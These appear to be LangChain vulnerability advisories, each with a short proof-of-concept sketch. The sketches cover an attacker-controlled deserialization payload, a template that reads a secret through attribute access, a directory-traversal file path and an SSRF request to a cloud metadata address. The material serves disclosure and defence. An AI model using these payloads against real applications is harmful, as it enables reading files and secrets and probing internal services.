LangChain contains older runtime code paths that deserialize run inputs, run outputs, or other application-controlled payloads using overly broad object allowlists. These paths may call load() with allowed_objects="all". This does not enable arbitrary Python object deserialization, but it does allow any trusted LangChain-serializable object to be revived, which is broader than these runtime paths require. As a result, attacker-supplied LangChain serialized constructor dictionaries may cause trusted runtime paths to instantiate …
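A minimal sketch of the affected shape, assuming the allowed_objects parameter named above; the payload follows LangChain's serialized-constructor format, and the revived class is illustrative:

```python
from langchain_core.load import load

# Attacker-controlled payload in LangChain's serialized-constructor
# format: "id" can name any trusted LangChain-serializable class.
payload = {
    "lc": 1,
    "type": "constructor",
    "id": ["langchain", "prompts", "prompt", "PromptTemplate"],
    "kwargs": {"template": "{x}", "input_variables": ["x"]},
}

# Overly broad: revives any trusted serializable object, which is far
# more than a run-input/run-output path actually needs to accept.
obj = load(payload, allowed_objects="all")
```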
LangChain's f-string prompt-template validation was incomplete in two respects. First, some prompt template classes accepted f-string templates and formatted them without enforcing the same attribute-access validation as PromptTemplate. In particular, DictPromptTemplate and ImagePromptTemplate could accept templates containing attribute access or indexing expressions and subsequently evaluate those expressions during formatting. Examples of the affected shape include "{message.additional_kwargs[secret]}" and "https://example.com/{image.__class__.__name__}.png". Second, f-string validation based on parsed top-level field names did not reject nested …
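A minimal sketch in plain Python of why these shapes are dangerous (the Message class and secret value are illustrative): str.format() resolves attribute access and indexing on substituted objects, so formatting alone can walk into nested state.

```python
# Stand-in for an object with sensitive nested state.
class Message:
    def __init__(self) -> None:
        self.additional_kwargs = {"secret": "s3cr3t-token"}

# Equivalent to what an affected template evaluates during formatting:
# attribute access, then string-keyed indexing, via str.format() alone.
print("{message.additional_kwargs[secret]}".format(message=Message()))
# -> s3cr3t-token
```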
Multiple functions in langchain_core.prompts.loading read files from paths embedded in deserialized config dicts without validating against directory traversal or absolute path injection. When an application passes user-influenced prompt configurations to load_prompt() or load_prompt_from_config(), an attacker can read arbitrary files on the host filesystem, constrained only by file-extension checks (.txt for templates, .json/.yaml for examples). Note: The affected functions (load_prompt, load_prompt_from_config, and the .save() method on prompt classes) are undocumented legacy …
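A minimal sketch of the traversal shape, assuming the legacy _type/template_path config keys; the path is illustrative:

```python
from langchain_core.prompts.loading import load_prompt_from_config

# Attacker-influenced config: template_path escapes any intended
# directory, constrained only by the .txt extension check.
config = {
    "_type": "prompt",
    "input_variables": ["x"],
    "template_path": "../../../../home/victim/notes.txt",
}

prompt = load_prompt_from_config(config)
print(prompt.template)  # contents of the traversed file
```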
The ChatOpenAI.get_num_tokens_from_messages() method fetches arbitrary image_url values without validation when computing token counts for vision-enabled models. This allows attackers to trigger Server-Side Request Forgery (SSRF) attacks by providing malicious image URLs in user input.
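A minimal sketch of the SSRF shape; the model name and metadata URL are illustrative, not specifics from the advisory:

```python
from langchain_core.messages import HumanMessage
from langchain_openai import ChatOpenAI

llm = ChatOpenAI(model="gpt-4o")

# Attacker-supplied content pointing at an internal endpoint.
msg = HumanMessage(content=[
    {"type": "text", "text": "What is in this image?"},
    {
        "type": "image_url",
        "image_url": {"url": "http://169.254.169.254/latest/meta-data/"},
    },
])

# Affected versions fetch the image URL server-side to size it for
# token counting, issuing the request without any model call.
llm.get_num_tokens_from_messages([msg])
```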